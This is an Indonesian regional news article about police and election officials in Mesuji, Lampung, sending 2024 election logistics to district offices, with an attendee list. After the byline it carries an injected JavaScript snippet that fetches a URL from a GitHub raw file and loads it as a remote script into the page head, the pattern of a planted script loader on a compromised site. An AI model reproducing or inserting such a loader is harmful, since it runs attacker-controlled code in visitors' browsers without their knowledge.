Kapolres Mesuji Bersama Ketua KPU Dan Stakeholder Lainnya Melepas Pendistribusian Logistik Pemilu 2024

Mesuji Tempo //Mesuji (Lampung) 

Kapolres Mesuji menghadiri acara Pelepasan Logistik Pemilu 2024 dari Gudang Logistik KPU menuju masing masing Kantor PPK yang ada di 7 Kecamatan. Sabtu (10/02/24)

Ketua KPU Kabupaten Mesuji Ali Yasir S.T mengatakan Hari ini Khususnya KPU Kabupaten Mesuji melaksanakan kegiatan Pelepasan ataupun Distribusi Logistik Pemilu 2024 ke Kecamatan yang ada di Kabupaten mesuji terhitung mulai Tanggal 10 Februari hingga selesai.

Mudah mudahan perjalanan logistik dalam Tiga hari ini berjalan dengan lancar bisa Sampai di kecamatan dengan tidak ada kendala yang menyebabkan logistik rusak,

Logistik Kotak suara yang di distribusikan sebanyak 3.315, setiap kecamatan di sesuaikan dengan jumlah TPS yang ada setiap kecamatan nya. dan semua logistik baik untuk yang di dalam maupun di luar hari ini semua di distribusikan.

Kemudian Kapolres Mesuji AKBP Ade Hermanto S.H, S.IK, CPHR mengungkapkan, dalam kegiatan seremoni pendistribusian Logistik Pemilu 2024 dari Kantor KPU ke Kantor PPK, Polres Mesuji menempatkan 21 Personil yang terbagi di 7 Titik Kecamatan.

Selanjutnya untuk pergeseran Pasukan Pengamanan akan dilaksanakan pada H-1 sebanyak 163 Personel yang akan di tempatkan di 663 TPS yang ada di Kabupaten Mesuji,

Kapolres dan stakeholder terkait berharap Pemilu dapat berjalan dengan Kondusif, dan kepada Masyarakat dapat hadir ke TPS pada Tanggal 14 Februari 2024 untuk memberikan hak suaranya dalam memilih pemimpin yang Amanah

.Acara pelepasan dihadiri oleh Perwakilan PJ Bupati Mesuji Sakroni, S.Sos., M.I.P., Kapolres Mesujpi AKBP Ade Hermanto, S.H., S.I.K., CPHR, Perwakilan Dandim 0426/TB atau Babinsa Koramil 426-01/SP SERMA Burhanudin, Kajari Mesuji Azy Tyawhardana, S.H., M.H, Ketua KPU Kabupaten Mesuji Ali Yasir, S.T, Ketua Bawaslu Kabupaten Mesuji Deden Cahyono, S.Sos, Kabag Ops Polres Mesuji KOMPOL Iwan Dharmawan, S.H., M.H, Kasat Reskrim Polres Mesuji AKP Sigit Barazili, S.T., M.H, Kasat Intelkam IPTU Asiadi Wasito, S.H. Komisioner KPU Kabupaten Mesuji Imani, S.Pd.I, Sururi Abdillah, S.E,  Eko Sumarsono, S.T, Majeha, S.Pd, Komisioner Bawaslu Kabupaten Mesuji Robby Ruyudha, S.I.P, Sekertaris KPU Kabupaten Mesuji Febra Oka Mahendra, S.H, Para Kapolsek dan Kasubsektor jajaran Polres Mesuji, Personil Polres/Polsek/Polsubsektor Polres Mesuji dalam Pengawalan Logistik Pemilu Tahun 2024, Para Staff KPU Kab. Mesuji, Para Staff Bawaslu Kab. Mesuji dan Para Sekretariat PPK dan PPS Se-Kabupaten Mesuji. (Ferdi akbar)

(var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *